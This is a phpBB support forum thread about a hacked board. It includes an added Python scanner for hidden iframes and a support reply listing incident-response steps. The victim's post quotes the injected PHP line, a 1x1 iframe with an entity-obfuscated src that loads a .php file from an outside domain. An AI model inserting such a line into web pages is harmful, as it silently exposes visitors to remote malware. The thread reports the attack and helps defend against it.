Hacked!

Get help with installation and running phpBB 3.0.x here. Please do not post bug reports, feature requests, or MOD-related questions here.
END OF SUPPORT: 1 January 2017 (announcement)
DBM
Registered User
Posts: 159
Joined: Tue Oct 25, 2005 10:29 pm

Hacked!

Post by DBM »

I had only gone out for half an hour and in that time my forum was hacked. I'm not sure exactly how they did it yet, but it seems that many forum pages were edited (presumably by some bot of some kind) and had code like this added to each page:

Code:

<?php echo '<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe>'; ?>

I'm restoring my backups as of now. At this stage I haven't a clue whether the board itself was hacked or if they somehow managed to obtain the FTP password (database looks OK at the moment).

Is there someone on the phpBB security team I can contact?

Thanks.
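
The injected line in the post above is a 1x1 iframe whose src is written entirely as numeric character references, so a plain text search for "http" does not find it. The following read-only scanner is an added example, not part of the original post or of phpBB; the extension list, the threshold of four entities and the sample host are assumptions, and the sample input is constructed.

```python
import html
import os
import re
import sys

# Assumed list of web-root file types worth checking; extend for your site.
EXTENSIONS = (".php", ".html", ".htm", ".tpl", ".inc", ".js")
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")
ENTITY_RE = re.compile(r"&#x?[0-9a-fA-F]+;")
HIDDEN_STYLE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

# Constructed sample: same shape as the injected line, harmless .invalid host.
SAMPLE_URL = "http://example.invalid/x.php"
SAMPLE = "<?php echo '<iframe src=\"%s\" width=1 height=1></iframe>'; ?>" % (
    "".join("&#%d;" % ord(c) for c in SAMPLE_URL))

def suspicious_iframes(text):
    """Yield (reasons, decoded_src) for iframes that are tiny, hidden or entity-encoded."""
    for tag in IFRAME_RE.findall(text):
        attrs = {k.lower(): v.strip("\"'") for k, v in ATTR_RE.findall(tag)}
        src = attrs.get("src", "")
        reasons = []
        if any(attrs.get(k, "").lower().rstrip("px") in ("0", "1") for k in ("width", "height")):
            reasons.append("tiny")
        if HIDDEN_STYLE_RE.search(attrs.get("style", "")):
            reasons.append("hidden-style")
        # A src written as numeric character references hides the URL from grep.
        if len(ENTITY_RE.findall(src)) >= 4:
            reasons.append("entity-encoded-src")
        if reasons:
            yield reasons, html.unescape(src)

def scan_tree(root):
    """Walk root and return [(path, reasons, decoded_src)] for every flagged iframe."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(EXTENSIONS):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings += [(path, r, s) for r, s in suspicious_iframes(fh.read())]
    return findings

if __name__ == "__main__":
    hits = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else [
        ("<sample>", r, s) for r, s in suspicious_iframes(SAMPLE)]
    for path, reasons, src in hits:
        print(path, ",".join(reasons), src, sep="\t")
```

Pass a directory as the first argument to scan it; with no argument the script runs on the constructed sample. It only reads files, so it can be pointed at a saved copy of the site.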

Noxwizard
Support Team Leader
Posts: 10361
Joined: Mon Jun 27, 2005 8:41 pm
Location: Texas, USA
Name: Patrick Webster

Re: Hacked!

Post by Noxwizard »

If the code has been added to every page, then it sounds more like a server vulnerability than one in phpBB. Having said that, please do the following:
My board has been hacked, what do I do? wrote:
Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board; the proper place for incident reports is the tracker.
Do not contact me for private support, please share the question in our forums.
